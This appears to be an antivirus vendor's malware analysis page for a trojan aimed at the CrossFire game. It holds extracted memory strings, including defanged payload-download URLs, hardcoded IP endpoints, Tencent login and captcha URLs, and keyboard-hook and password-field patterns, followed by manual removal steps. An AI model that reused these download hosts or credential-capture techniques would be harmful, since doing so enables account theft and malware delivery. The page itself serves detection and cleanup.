gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=23074&g_tk_type=1&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
hXXp://starvip.qq.com/fcg-bin/v2/fcg_mobile_starvip_site_checkin?g_tk=
&_=1454839692917
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
msg": "
&pvsrc=102&s_p=0|http|&s_v=6.1.0.496&ozid=511022&vipid=&actid=68391&sid=&callback=json14530355412865&cache=3654
hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
hXXp://proxy.vac.qq.com/cgi-bin/srfentry.fcgi?ts=1456988761581&g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 QQ/6.2.2.402 Pixel/640 NetType/WIFI Mem/86
&_=1452520903377
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?callbackFun=woaiwang&uin=
Referer: hXXp://qiandao.qun.qq.com/cgi-bin/sign
Host: qiandao.qun.qq.com
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://c.pc.qq.com/fcgi-bin/signin?callback=jsonp1453084008086&_=1453084046097&mood_id=238&checkin_date=&remark=一支穿云箭 千军万马来相见。
08 08 08 50
hXXp://cfzhushou.com/cfzs/help.html
hXXp://cfzhushou.com/help.html
hXXp://ip.qq.com/cgi-bin/myip
hXXps://aq.qq.com/cn2/safe_service/device_lock
aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/cap_union_verify_new?random=1480258509499
&pt_randsalt=0&u1=http://cf.qq.com&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
hXXp://ossweb-img.qq.com/images/clientpop/act/cf/GpmHelpAct.js
http2://ossweb
hXXp://ossweb
"img":"http2(.*?).jpg"
"hXXp://(.*?)":{
"~ /1~!<
fD.nn'1r?
.KM8'
$&%cw]
hXXp://leesin.zuhaowan.com-
hXXp://leesin.zuhaowan.cn
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
1970.01.01 08:00:00
function timea(){var d,s;d=new Date();d.setTime('
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=55856&sServiceDepartment=group_f
hXXp://apps.game.qq.com/cf/a20160726hxb/getUserTask.php?action=getMyTaskList&iArea=
Referer:hXXp://cf.qq.com/act/a20160726hxb/index.htm
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
"sMsg":"MODULE OK"
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
|322|
*&checkparam=cf|yes|
&ams_checkparam=cf|yes|
sCdKey=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
sMsg" : "
\gzip.dll
`.data
gzip.pdb
_u%SV
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://cfzhushou.com/pay.html
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=4&d=72&v=4&t=0.061519597441372864&daid=8
&js_ver=10151&js_type=1&login_sig=7qKho-IT4nBHQJBVoTYw6p-IGP0hieZLRsmCy5MWU7g0bRJNRkb5q8yH7BUA7cTM&pt_uistyle=20&aid=21000124&daid=8&
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?ptredirect=1&u1=http://cf.qq.com/cp/a20160223czxlx/index.htm?e_code=213709&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=6-0-
game.qq.com
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://apps.game.qq.com&style=34
hXXp://cf.qq.com/cfvip/
hXXp://xinyue.qq.com
o%%co
``PBi %c
<\-M}*0_
;ptlogin2
apps.game.qq.com
hXXp://login.game.qq.com/comm-cgi-bin/login/LoginReturnInfo.cgi?callback=jsonp21&game=cf
nickName":"
?kernel32.dll
{56FDF344-FD6D-11d0-958A-006097C9A090}
{EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF}
Report
themepassword
SysShadow.HostWnd
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
1970-01-01 00:00:00
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
background(?:-image)?:.*?[\s]*?url[\s]*?\([#
']?(.*?)[#
onkeydown|
onkeyup|
onkeypress|
wA{0002DF05-0000-0000-C000-000000000046}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{6D5140C1-7436-11CE-8034-00AA006009FA}
text|password|file
?)-D%f`
location.reload()
window.location.href="
{25336920-03F9-11CF-8FD0-00AA00686F13}
hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
document.all.retjs.innerText=
javascript:document.body.contentEditable='true';document.designMode='on';void 0;
javascript:document.body.contentEditable='false';document.designMode='on';void 0;
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
type=password
[password]
var jies = document.getElementsByTagName('object');for(var jie in jies){if(jies[jie].classid=='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'){jies[jie].removeNode(true);}}
user.qzone.qq.com
mail.qq.com
onkeyup
type='password'
type="password"
, 1, , ,
var jie = document.createStyleSheet();jie.addRule('html','
').value="
document.getElementById('
LocationURL
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
SysShadow.Menu
Microsoft.XMLDOM
14:00~16:00
12:00-19:00
1.2.18
%*.*f
MSWHEEL_ROLLMSG
WSOCK32.dll
msscript.ocx
VVV.dywt.com.cn
USER32.DLL
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\Scsi%d:
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
;3 #>6.&
'2, / 0&7!4-)1#
(*.htm;*.html)|*.htm;*.html
its:%s::%s
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
.PAVCOleException@@
.PAVCOleDispatchException@@
right-curly-bracket
left-curly-bracket
0123456789
c:\%original file name%.exe
GetKeyboardState
InternetCanonicalizeUrlA
1.0.15.507
T%Program Files%\NamuADLook.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
(*.*)
1.0.0.0
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}

%original file name%.exe_3308_rwx_01FE0000_00013000:

.text
`.rdata
@.data
.rsrc
@.reloc
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
<fd:%d>
%c%c%c%c%c%c%c%c%c%c
MSVCRT.dll
KERNEL32.dll
zlib1.dll
!"#$%&'()* ,-./012
DLL support by Alessandro Iacopetti & Gilles Vollant

TcService.exe_2764:

.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
CF_Helper.dll
wininet.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
\CF_Helper.dll
@.reloc
HTTP/1.1
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
Helper.dll
KERNEL32.dll
ShellExecuteA
SHELL32.dll
InternetCrackUrlA
HttpQueryInfoW
WININET.dll
GetProcessHeap
GetCPInfo
zcÁ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
7.84888<8@8
6 696?6{6
14686<6@6
5 5(50585
? ?$?,?@?`?
>$>0>4>8><>
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
crossfire.exe
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
WinExec
GetKeyState
USER32.dll
GetViewportOrgEx
GDI32.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
C:\TcService.exe
#include "l.chs\afxres.rc" // Standard components
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
T%Program Files%\NamuADLook.dll
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
(*.*)
1.0.0.0

sesvcs_963_56089.exe_1956:

.text
`.rdata
@.data
.rsrc
@.reloc
8%u/P
operator
GetProcessWindowStation
_CorExeMain
.detour
222.187.222.209
123.149.255.10:7077
NtQueryKey
?456789:;<=
!"#$%&'()* ,-./0123
?mac=%I64d&clickurl=%s&fromurl=%s&ver=%d&unionid=%d&iver=%d&uver=%d
EXPLORER.EXE
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
?mac=%I64d&ver=%d&uver=%d&iver=%d&iswork=%d
E:\code\code\operate_text1015\operate_text\svn_Click_V_Click_LaoLiao\Release\WJDC1230_7777_42222.pdb
GetProcessHeap
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
MSIMG32.dll
WS2_32.dll
InternetOpenUrlW
HttpQueryInfoW
FindFirstUrlCacheEntryW
DeleteUrlCacheEntryW
FindNextUrlCacheEntryW
WININET.dll
GdiplusShutdown
gdiplus.dll
IPHLPAPI.DLL
GetCPInfo
zcÁ
#*1892 $
%,3:;4-&
.?AUDWebBrowserEvents2@@
ýezccc{
$/%DS
.CCCO222VBAAo
:::`121]
(('0"!!,
NNMSgfeu?B>T&&%0
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
=(=,=0=4=
5!5.585[5
%0S0i0
> >$>(>,>
;*<0<4<8<<<
7 7$7(7,7074787
? ?@?`?|?
mscoree.dll
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
dbghelp.dll
MSCOREE.DLL
hXXp://
00_URL=
7/get_apis/paths/UPath0.txt
DEF_URL=
DEF_TEST_URL=
DEF_SERVICE_SUPPORT=
Windows NT 6.1
Windows NT 5.1
--URL_QUICK_LINK_BEG--
--URL_QUICK_LINK_END--
04_NEVAGATE_INKEY_PROB=
%I64d,%s
ntdll.dll
advapi32.dll
kernelbase.dll
kernel32.dll
User32.DLL
DSound.dll
Winmm.dll
Y%dMÝ%d
HTTP://
desktop.ini
index.dat
Shell.Explorer
msimg32.dll
%s\%s
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
God bless you...Crush restart
1URL=
10UVSUPPORT=
11SKEYWORD=
riched20.dll
Advapi32.dll
..\unstall000.exe
7SPROB=%d[^-^]
9CBTNPROB=%d[^-^]
10UVSUPPORT=%d[^-^]
12DEF_XY_MOVE=%d[^-^]
13MAXUACOUNT=%d[^-^]
%d%d%d.txt
%I64d,%d
%Program Files%\sesvcs_963_56089.exe
[.]color=rgb(12,204,108);bold=true;fsize=-13[/.]%d[.]color=rgb(89,89,89);bold=false[/.]
[.]color=rgb(12,204,108);bold=true[/.]%d[.]color=rgb(89,89,89);bold=false[/.]
[.]color=rgb(0,0,0)[/.]%s
[.]color=rgb(0,0,0)[/.]%sc[.]color=rgb(12,204,108);fsize=-13;bold=true[/.]%s[.]color=rgb(153,153,153);bold=false[/.]
[.]color=rgb(0,0,0)[/.]%s
[.]color=rgb(12,204,108);bold=true[/.]%d[.]color=rgb(136,136,136);bold=false[/.]
[.]color=rgb(12,204,108);bold=true[/.]%s
[.]color=rgb(89,89,89);bold=false[/.]%s
[.]color=rgb(12,204,108);bold=true;fsize=-12[/.]%d [.]color=rgb(89,89,89);bold=false[/.]
[.]color=rgb(251,81,0);bold=true[/.]%s[.]color=rgb(102,102,102);bold=false[/.]
Z[.]color=rgb(0,0,0)[/.]%s
[.]color=rgb(12,204,108)[/.] %s[.]color=rgb(255,0,0)[/.] %s
[.]color=rgb(0,138,250);link=102;linkcolor=rgb(26,160,255)[/.]%s^[.]bold=true[/.]
[.]color=rgb(12,204,108);bold=true[/.]%d[.]bold=true[/.]
^[.]color=rgb(0,0,0)[/.]%s
[.]color=rgb(12,204,108)[/.] %s[.]color=rgb(157,157,157)[/.] %s
[.]color=rgb(12,204,108);bold=true;fsize=-12[/.] %d [.]color=rgb(89,89,89);bold=false[/.]
[.]color=rgb(12,208,104);fsize=-16;[/.] %s[.]color=rgb(0,0,0);fsize=-16;[/.]?
%sf[.]color=rgb(51,51,51);fsize=-12[/.]%s
[.]color=rgb(12,204,108)[/.]%s[.]color=rgb(255,0,0)[/.] %s
360.cn
7, 1, 0, 1120
(C) 360.cn All Rights Reserved.
SoftMgr.exe

%original file name%.exe_3308_rwx_10001000_00033000:

f9z.vk
@Microsoft.XMLDOM
dwmapi.dll
Riched20.dll
Riched32.dll
{00000000-0000-0000-C000-000000000046}
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
kernel32.dll
ole32.dll
gdiplus.dll
GdiPlus.dll
gdi32.dll
user32.dll
Advapi32.dll
advapi32.dll
User32.dll
ntdll.dll
Ole32.dll
shell32.dll
atl.dll
program internal error number is %d.
:"%s"
:"%s".
GetProcessHeap
&..0`%X
.text
`.rdata
@.data
.rsrc
.reloc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    TcService.exe:2764

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Program Files%\23.txt (30170 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\01[1].txt (26410 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SB1GUIDO.txt (111 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\NamuADLook[1].dll (16650 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\26993501420171281319931[1].htm (29233 bytes)
    C:\CF_Helper.dll (202 bytes)
    %Program Files%\NamuADLook.dll (20370 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\33[1].txt (40 bytes)
    C:\ProgramData\MD PlatForm\3073838834852099154 (15 bytes)
    %Program Files%\unstall000.exe (3361 bytes)
    C:\ProgramData\tmpst\shst (21 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XG142QU4.txt (114 bytes)
    C:\ProgramData\MD PlatForm\2242737149763168244 (15 bytes)
    C:\ProgramData\MD PlatForm\UContext (182 bytes)
    C:\ProgramData\MD PlatForm\7 (1 bytes)
    C:\ProgramData\MD PlatForm\5 (1 bytes)
    C:\TcService.exe (1670 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S0FG29A4.txt (89 bytes)
    C:\exdui.dll (110 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\2672760322016102115848934[1].htm (107215 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now